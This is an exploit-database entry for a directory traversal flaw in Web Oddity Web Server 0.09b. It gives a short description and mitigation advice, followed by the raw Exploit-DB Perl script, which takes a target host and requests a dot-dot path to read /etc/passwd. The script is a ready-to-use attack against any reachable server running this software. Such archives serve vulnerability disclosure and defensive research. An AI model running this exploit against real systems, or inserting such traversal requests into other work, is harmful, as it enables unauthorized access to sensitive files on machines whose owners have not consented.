Web Oddity Web Server 0.09b Directory Transversal Vulnerability

vendor:

Web Server

by:

Katatafish

5.5

CVSS

MEDIUM

Directory Transversal

CWE

Product Name: Web Server

Affected Version From: 0.09b

Affected Version To: 0.09b

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Web Oddity Web Server 0.09b Directory Transversal Vulnerability

This exploit allows an attacker to perform directory traversal and read the contents of sensitive files on the target system. By providing a specially crafted input, the attacker can bypass the intended file path and access files outside of the web server's root directory.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and sanitization techniques. The web server should also enforce strict file access permissions to prevent unauthorized access to sensitive files.

Source

Exploit-DB raw data:

# Web Oddity Web Server 0.09b Directory Transversal Vulnerability
# Found by: Katatafish (karatatata@hush.com)
# Download: http://sourceforge.net/project/showfiles.php?group_id=13854
# Thanks: str0ke

use LWP::Simple;
use strict;

sub usage
{
       print "----------------------------------------------------- - -----------\n";
       print "Web Oddity Web Server 0.09b Directory Transversal Vulnerability\n";
       print "\n";
       print "usage: $0 www.site.com\n";
       print "------------------------------------------------- Katatafish-----\n";
       exit ();
}

my $host=shift || &usage;
getprint 'http://' . $host . '/../../../../../../../etc/passwd';

# milw0rm.com [2007-09-04]